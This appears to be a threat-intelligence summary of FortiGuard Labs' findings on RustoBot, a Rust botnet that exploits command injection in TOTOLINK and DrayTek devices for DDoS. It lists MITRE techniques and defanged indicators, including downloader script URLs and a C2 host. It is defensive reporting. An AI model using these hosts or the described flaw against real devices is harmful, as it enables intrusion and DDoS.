This article discusses the emergence of a new botnet named βRustoBotβ that targets vulnerabilities in various TOTOLINK and DrayTek devices. Written in Rust, it exploits command injection vulnerabilities to gain remote control over these systems. The attacks, identified by FortiGuard Labs, specifically affected technology industries in multiple countries. Affected: TOTOLINK devices, DrayTek devices, technology industry
Keypoints :
- FortiGuard Labs discovered βRustoBot,β a new Rust-based botnet targeting TOTOLINK devices.
- The malware exploits command injection vulnerabilities in the cstecgi.cgi file of TOTOLINK devices.
- Multiple versions of TOTOLINK devices and specific DrayTek devices are affected.
- The botnet distributes malware through various downloader scripts.
- RustoBot can execute DDoS attacks using multiple protocols.
- Incidents were reported in Japan, Taiwan, Vietnam, and Mexico.
- The botnet uses DNS-over-HTTPS for masking its traffic.
- FortiGuard provides antivirus and IPS signatures to protect against the exploits.
MITRE Techniques :
- Command-Line Interface (T1059.001): Leveraged for executing scripts using wget and tftp commands to install RustoBot.
- Exploitation of Remote Services (T1210): Exploits the vulnerabilities in TOTOLINK devices for remote code execution.
- Application Layer Protocol (T1071): Uses DNS-over-HTTPS to obfuscate malicious traffic.
- DDoS: Launches DDoS attacks via UDP, raw IP, and TCP protocols.
Indicator of Compromise :
- [URL] hxxp://66[.]63[.]187[.]69/w.sh
- [URL] hxxp://66[.]63[.]187[.]69/wget.sh
- [URL] hxxp://66[.]63[.]187[.]69/tftp.sh
- [Host] dvrhelper[.]anondns[.]net
- [IP Address] 5[.]255[.]125[.]150